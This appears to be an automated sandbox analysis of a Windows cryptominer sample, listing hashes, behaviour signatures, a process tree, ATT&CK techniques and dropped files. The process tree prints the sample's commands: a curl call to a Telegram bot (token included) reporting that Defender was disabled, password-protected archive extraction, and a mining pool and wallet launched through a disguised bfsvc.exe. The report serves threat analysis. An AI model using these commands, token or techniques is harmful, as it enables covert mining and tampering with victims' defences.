Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    04-12-2021 22:30

General

  • Target

    06c45ab0b5138b4244b4c800264966ab94ee4b5e06c13b58332c2cb792ca58aa.exe

  • Size

    120KB

  • MD5

    3850da296f3c2596aaba5dba02f0b204

  • SHA1

    d39cb436d340ad2dc81cfeb2e2aeea21d3a22e2a

  • SHA256

    06c45ab0b5138b4244b4c800264966ab94ee4b5e06c13b58332c2cb792ca58aa

  • SHA512

    3b47e5e3caaf197e54179456fc61f709771cec77e642b5aab1c7d8b04c1d9161806d39d5866da9d4cfc3a72730aae3d17db640154de7cf771d8d04dfe3d73ee7

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\06c45ab0b5138b4244b4c800264966ab94ee4b5e06c13b58332c2cb792ca58aa.exe
    "C:\Users\Admin\AppData\Local\Temp\06c45ab0b5138b4244b4c800264966ab94ee4b5e06c13b58332c2cb792ca58aa.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2700
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl "https://api.telegram.org/bot1765686682:AAFKW2CipVCRG2oYuHNFJMKO8RSC06ZylW8/sendMessage?chat_id=-679243704&text=%F0%9F%90%B7%20%D0%A3%20%D0%B2%D0%B0%D1%81%20%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9%20%D0%B2%D0%BE%D1%80%D0%BA%D0%B5%D1%80!%0A%D0%92%D0%B8%D0%B4%D0%B5%D0%BE%D0%BA%D0%B0%D1%80%D1%82%D0%B0%3A%20Microsoft Basic Display Adapter%0A(Windows%20Defender%20has%20been%20turned%20off)"
      2⤵
        PID:3248
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2416
        • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
          C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:1028
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3948
        • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
          C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:2980
      • C:\Windows\bfsvc.exe
        C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 966238e0d3C22B90435D92a6f01665fbf8a92a3A -coin etc -worker EasyMiner_Bot -clKernel 3
        2⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:380
      • C:\Windows\explorer.exe
        C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 966238e0d3C22B90435D92a6f01665fbf8a92a3A -coin etc -worker EasyMiner_Bot -clKernel 3
        2⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1708
        • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:2716
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2164
            • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
              C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:3040
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
            4⤵
              PID:3036
              • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of AdjustPrivilegeToken
                PID:888
            • C:\Windows\bfsvc.exe
              C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 966238e0d3C22B90435D92a6f01665fbf8a92a3A -coin etc -worker EasyMiner_Bot -clKernel 3
              4⤵
                PID:1568
              • C:\Windows\explorer.exe
                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 966238e0d3C22B90435D92a6f01665fbf8a92a3A -coin etc -worker EasyMiner_Bot -clKernel 3
                4⤵
                  PID:3488

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Defense Evasion

          Modify Registry

          2
          T1112

          Disabling Security Tools

          1
          T1089

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\12B578593FDE07EC53D020B1D5DEBF3B_5D74C2DB556F94499BCD6D74A36958A3
            MD5

            b72536fd975083047f223fd573c59ed6

            SHA1

            1935eff6fca52aa883ca2885edc562065432283f

            SHA256

            7b88c8f2f357e74b31a34f20c6a1fd792b2f54c618610389e4925628d973f5b4

            SHA512

            12b85f3810ded4d88d65f77f649f1dc3efeccb258821f3edbef829176c03084b11c2c8a0bdc0166b8b1ea47a1aa9c614b34e619038c787e5a7bc040aa5426dbb

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2A7611428D62805A3E4E5BC4103D82E4_D0FA13DADFB59BDF00C474952E166CC1
            MD5

            bade7875c04a55961d97e91eb64a557a

            SHA1

            a3579cb55e58e8721e2e87421658004c5489e82a

            SHA256

            24bea066cb6b59985b354a6b69a283f36bf14c46ddb8b44c4dfaa3a2e5ffa753

            SHA512

            9b24c6fe6bc3c532c752146f0c28818fdae10bfa180950ce4f193de48b116e6ac2c076e5349082483f7dc9c6136ffd8e8e27f84a630517583096858ae45b0b20

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
            MD5

            afede62c66d60b4a72c31c0ba8baa956

            SHA1

            3e7da23c89e4455191598c0b73df22cf2280a8f3

            SHA256

            b8bb6517d3cec60bbce10b49d8c1eb8f4085b35b231f07fea8e0cf04f03f7210

            SHA512

            7640f0521d2fe632d69e9fa2f7535719bdcb5a674fabd124d21356537fad4ad693cbd6a7673f2142cc3886a686f3c78ba93fd8f1cfff25326015cdd18caf2458

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\12B578593FDE07EC53D020B1D5DEBF3B_5D74C2DB556F94499BCD6D74A36958A3
            MD5

            76d5da544fed952294b5f1f58a1c0840

            SHA1

            32245da6970b1fc4785f3def7fbb6a84ca87aea8

            SHA256

            4ddef037e455bd2026e731caa918b85f2863c5d599cb83d54b28c62e7c06fdc6

            SHA512

            9a7f8bc3d886b78af73d17e7d4324934215dc281013969764acded4da4bc9553b4857184e3365452f36077481642463738efde1bb3e4e42403833286fa7ffe39

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2A7611428D62805A3E4E5BC4103D82E4_D0FA13DADFB59BDF00C474952E166CC1
            MD5

            b233db707d8cb7ec0a70ebeaee55e1ce

            SHA1

            36d6b766a384324d8af4f1bfef1f73a54e65c4f3

            SHA256

            05112a863e97588fdf394773b26246bacf1912fa29fbec4346f887c6d7c08fd8

            SHA512

            dd65f5bd764b0c5c371302a8ee041c2adfedf945261554c997943867e59a8bf31e9e425cdfaa4b5df753d973861012152b50df5d5f8ef6d73de1d2956d3bd434

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
            MD5

            3191789f8ddb3e21472e9d63c228b6bd

            SHA1

            f991de3b9f6e2844fdb69947cb00b391c0cf4b7e

            SHA256

            5ce6621d4467bf357fa770a470865325ec9aa61d172922bffba832eb5b6a7a3d

            SHA512

            bd59f2dea8fcc30c37270c38b81cdc2b9f2a0fdadda5dbb196124ee8588fcc5756a3a38a0d5320eb18ccd002b158e8dfac8af2b7daf87e11c5a47b5a55b23267

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\1BA3P8U7\7z[1].exe
            MD5

            86e8388e83be8909d148518cf7b6e083

            SHA1

            4f7fdcf3abc0169b591e502842be074a5188c2c9

            SHA256

            4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

            SHA512

            2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\4DBU0RWN\RegData_Temp[1].zip
            MD5

            1543b223f63fda679a94d034d23b27ba

            SHA1

            82eb69d0d096ff966679ce92c4fb2dd5a8dd6f1e

            SHA256

            30868a1cadb90f598ec9d96f93650c90883941522134b2e0a2dfeca958958e34

            SHA512

            270de3749322416e371d5177b974450e5e2fbca3570179d2f4811f1fda55aca4ea82cbd0a37d1b56ee8614be154373054b573da854a818caafb41b3cee502f78

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\BNAKBOQY\RegHost_Temp[1].zip
            MD5

            32ab3a6509fe78d666dcafc5be73f2e1

            SHA1

            c16e1c2716b4ae5b9e5bfb9773d810344b539126

            SHA256

            dd2170bbea158a2c2b8c262c2be9c8d91fc3e86efe7f607fce7a9224a389bdec

            SHA512

            c31ee784de253c4f5c36990959d8e6f74b2b0eeecfd265cab2d5295be33f7af056e144d829adcd754c78e06023816cb3f576110314717ee7e50cc0af507f02fe

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YT6ZDZWI\7z[1].dll
            MD5

            42336b5fc6be24babfb87699c858fb27

            SHA1

            38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

            SHA256

            b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

            SHA512

            f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\7C9NAQVA.cookie
            MD5

            f3df14979b932e4bb3ffd81ec4dba3b0

            SHA1

            2a473a2f4fa288a7a218e88acf556e0810029d73

            SHA256

            63c192813989bb6cb4c3e00b1517bce21bfd4d5d8d582ca4c0d9448df6a647ae

            SHA512

            96edc226fe9aca935f9df395f19b9fa0dddcd762648d0f7c490b6285fb2f6dc0e592016e2a0117ffb458b9f5fed422a93000321d477241693d2e6656fc2a18a3

          • C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
            MD5

            42336b5fc6be24babfb87699c858fb27

            SHA1

            38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

            SHA256

            b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

            SHA512

            f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

          • C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
            MD5

            42336b5fc6be24babfb87699c858fb27

            SHA1

            38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

            SHA256

            b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

            SHA512

            f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

          • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
            MD5

            86e8388e83be8909d148518cf7b6e083

            SHA1

            4f7fdcf3abc0169b591e502842be074a5188c2c9

            SHA256

            4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

            SHA512

            2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

          • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
            MD5

            86e8388e83be8909d148518cf7b6e083

            SHA1

            4f7fdcf3abc0169b591e502842be074a5188c2c9

            SHA256

            4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

            SHA512

            2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

          • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
            MD5

            86e8388e83be8909d148518cf7b6e083

            SHA1

            4f7fdcf3abc0169b591e502842be074a5188c2c9

            SHA256

            4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

            SHA512

            2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

          • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
            MD5

            86e8388e83be8909d148518cf7b6e083

            SHA1

            4f7fdcf3abc0169b591e502842be074a5188c2c9

            SHA256

            4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

            SHA512

            2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

          • C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe
            MD5

            67a55e73dc3e285f5ecad2f52e4606aa

            SHA1

            280b8d8083aac33e1b05078bb6706f155cae47c7

            SHA256

            fc0e21a8e33d53a30207d3e0e3dc9079e253fc623cc4835877cbc39ca7a826a3

            SHA512

            e12b564cc866d3d50246c4326e0086daa3086adf8084f69c1f0fa49a091ed9a2c93ea07a2f6cc4eec30dea54492dbf12950e8e3e7f6c26208f7b57860f362efe

          • C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe
            MD5

            f98bb39d41481843010febf6c36746e0

            SHA1

            5b0e62cec45b6cc824a318550a5cfeffe1813a92

            SHA256

            b4c1cbc9c5affd8d9f31ea532164d770ff44a8b4ba73ad3bfb81cc900d9814d7

            SHA512

            54204ab329e30bab5bd7acdf87bdce300f5ebbf5033cca7f2bcee261f46d25f8971640eec628ce31aad31c8a86f2322387a75954b400709e48b742a7e4416fb8

          • C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip
            MD5

            1543b223f63fda679a94d034d23b27ba

            SHA1

            82eb69d0d096ff966679ce92c4fb2dd5a8dd6f1e

            SHA256

            30868a1cadb90f598ec9d96f93650c90883941522134b2e0a2dfeca958958e34

            SHA512

            270de3749322416e371d5177b974450e5e2fbca3570179d2f4811f1fda55aca4ea82cbd0a37d1b56ee8614be154373054b573da854a818caafb41b3cee502f78

          • C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip
            MD5

            1543b223f63fda679a94d034d23b27ba

            SHA1

            82eb69d0d096ff966679ce92c4fb2dd5a8dd6f1e

            SHA256

            30868a1cadb90f598ec9d96f93650c90883941522134b2e0a2dfeca958958e34

            SHA512

            270de3749322416e371d5177b974450e5e2fbca3570179d2f4811f1fda55aca4ea82cbd0a37d1b56ee8614be154373054b573da854a818caafb41b3cee502f78

          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
            MD5

            3850da296f3c2596aaba5dba02f0b204

            SHA1

            d39cb436d340ad2dc81cfeb2e2aeea21d3a22e2a

            SHA256

            06c45ab0b5138b4244b4c800264966ab94ee4b5e06c13b58332c2cb792ca58aa

            SHA512

            3b47e5e3caaf197e54179456fc61f709771cec77e642b5aab1c7d8b04c1d9161806d39d5866da9d4cfc3a72730aae3d17db640154de7cf771d8d04dfe3d73ee7

          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
            MD5

            3850da296f3c2596aaba5dba02f0b204

            SHA1

            d39cb436d340ad2dc81cfeb2e2aeea21d3a22e2a

            SHA256

            06c45ab0b5138b4244b4c800264966ab94ee4b5e06c13b58332c2cb792ca58aa

            SHA512

            3b47e5e3caaf197e54179456fc61f709771cec77e642b5aab1c7d8b04c1d9161806d39d5866da9d4cfc3a72730aae3d17db640154de7cf771d8d04dfe3d73ee7

          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exe
            MD5

            9d99b4d43e4e7a0408c5fe99b4cc4afe

            SHA1

            702436963243f0de2d431ec29b199505a0aa3b90

            SHA256

            c9e36c039bfc370135feabad11840fe457caec3c4914351461f3f9e115194fb3

            SHA512

            44620e76efc6d0cefc1c6f8eca77c0114d41fbf4d6e1f6ff2287286ff57aca1679a0428b35c757afb96fd31d99de8b9e1d956b89636d9c373248e5c5b5b05754

          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exe
            MD5

            cb7268c8e1c3f49fc1ea3c4d52770ee6

            SHA1

            44b6a8ecc8090118563d7da7f4d354b428233df0

            SHA256

            aa31fab5e09fb056a25545633a8b5f5e5b20d16546ec9a7337f182a7f5d1cec7

            SHA512

            fbb38699421331d4d473610f5164e0577839152e1d8901bb36247ece3f8980f865763295355d87849d0295597b3c4e96c0613ace51dfb4fb3bfa9ef52dfe8de1

          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip
            MD5

            32ab3a6509fe78d666dcafc5be73f2e1

            SHA1

            c16e1c2716b4ae5b9e5bfb9773d810344b539126

            SHA256

            dd2170bbea158a2c2b8c262c2be9c8d91fc3e86efe7f607fce7a9224a389bdec

            SHA512

            c31ee784de253c4f5c36990959d8e6f74b2b0eeecfd265cab2d5295be33f7af056e144d829adcd754c78e06023816cb3f576110314717ee7e50cc0af507f02fe

          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip
            MD5

            32ab3a6509fe78d666dcafc5be73f2e1

            SHA1

            c16e1c2716b4ae5b9e5bfb9773d810344b539126

            SHA256

            dd2170bbea158a2c2b8c262c2be9c8d91fc3e86efe7f607fce7a9224a389bdec

            SHA512

            c31ee784de253c4f5c36990959d8e6f74b2b0eeecfd265cab2d5295be33f7af056e144d829adcd754c78e06023816cb3f576110314717ee7e50cc0af507f02fe

          • \Users\Admin\AppData\Roaming\Microsoft\7z.dll
            MD5

            42336b5fc6be24babfb87699c858fb27

            SHA1

            38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

            SHA256

            b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

            SHA512

            f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

          • \Users\Admin\AppData\Roaming\Microsoft\7z.dll
            MD5

            42336b5fc6be24babfb87699c858fb27

            SHA1

            38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

            SHA256

            b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

            SHA512

            f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

          • \Users\Admin\AppData\Roaming\Microsoft\7z.dll
            MD5

            42336b5fc6be24babfb87699c858fb27

            SHA1

            38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

            SHA256

            b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

            SHA512

            f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

          • \Users\Admin\AppData\Roaming\Microsoft\7z.dll
            MD5

            42336b5fc6be24babfb87699c858fb27

            SHA1

            38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

            SHA256

            b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

            SHA512

            f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

          • memory/380-151-0x0000000140000000-0x0000000141660000-memory.dmp
            Filesize

            22.4MB

          • memory/380-141-0x0000000140000000-0x0000000141660000-memory.dmp
            Filesize

            22.4MB

          • memory/380-149-0x0000000140000000-0x0000000141660000-memory.dmp
            Filesize

            22.4MB

          • memory/380-147-0x0000000140000000-0x0000000141660000-memory.dmp
            Filesize

            22.4MB

          • memory/380-153-0x0000000140000000-0x0000000141660000-memory.dmp
            Filesize

            22.4MB

          • memory/380-154-0x0000000140000000-0x0000000141660000-memory.dmp
            Filesize

            22.4MB

          • memory/380-155-0x0000000140000000-0x0000000141660000-memory.dmp
            Filesize

            22.4MB

          • memory/380-156-0x0000000140000000-0x0000000141660000-memory.dmp
            Filesize

            22.4MB

          • memory/380-137-0x00007FF7CE3D0000-0x00007FF7CE7A1000-memory.dmp
            Filesize

            3.8MB

          • memory/380-135-0x000001A965A60000-0x000001A965A62000-memory.dmp
            Filesize

            8KB

          • memory/380-144-0x0000000140000000-0x0000000141660000-memory.dmp
            Filesize

            22.4MB

          • memory/380-133-0x000001A965A60000-0x000001A965A62000-memory.dmp
            Filesize

            8KB

          • memory/380-128-0x0000000140000000-0x0000000141660000-memory.dmp
            Filesize

            22.4MB

          • memory/380-134-0x0000000140000000-0x0000000141660000-memory.dmp
            Filesize

            22.4MB

          • memory/380-129-0x000000014165D878-mapping.dmp
          • memory/888-178-0x0000000000000000-mapping.dmp
          • memory/1028-117-0x0000000000000000-mapping.dmp
          • memory/1568-184-0x000000014165D878-mapping.dmp
          • memory/1568-189-0x000001975EE00000-0x000001975EE02000-memory.dmp
            Filesize

            8KB

          • memory/1568-188-0x000001975EE00000-0x000001975EE02000-memory.dmp
            Filesize

            8KB

          • memory/1708-136-0x0000000140000000-0x0000000140E38000-memory.dmp
            Filesize

            14.2MB

          • memory/1708-140-0x0000000140000000-0x0000000140E38000-memory.dmp
            Filesize

            14.2MB

          • memory/1708-146-0x0000000140000000-0x0000000140E38000-memory.dmp
            Filesize

            14.2MB

          • memory/1708-139-0x0000000000CA0000-0x0000000000CA2000-memory.dmp
            Filesize

            8KB

          • memory/1708-145-0x0000000140000000-0x0000000140E38000-memory.dmp
            Filesize

            14.2MB

          • memory/1708-132-0x0000000140E36784-mapping.dmp
          • memory/1708-131-0x0000000140000000-0x0000000140E38000-memory.dmp
            Filesize

            14.2MB

          • memory/1708-142-0x00007FF6ABE30000-0x00007FF6AC201000-memory.dmp
            Filesize

            3.8MB

          • memory/1708-143-0x0000000140000000-0x0000000140E38000-memory.dmp
            Filesize

            14.2MB

          • memory/1708-138-0x0000000000CA0000-0x0000000000CA2000-memory.dmp
            Filesize

            8KB

          • memory/2164-171-0x0000000000000000-mapping.dmp
          • memory/2416-116-0x0000000000000000-mapping.dmp
          • memory/2716-158-0x0000000000000000-mapping.dmp
          • memory/2980-123-0x0000000000000000-mapping.dmp
          • memory/3036-177-0x0000000000000000-mapping.dmp
          • memory/3040-172-0x0000000000000000-mapping.dmp
          • memory/3248-115-0x0000000000000000-mapping.dmp
          • memory/3488-187-0x0000000140E36784-mapping.dmp
          • memory/3948-122-0x0000000000000000-mapping.dmp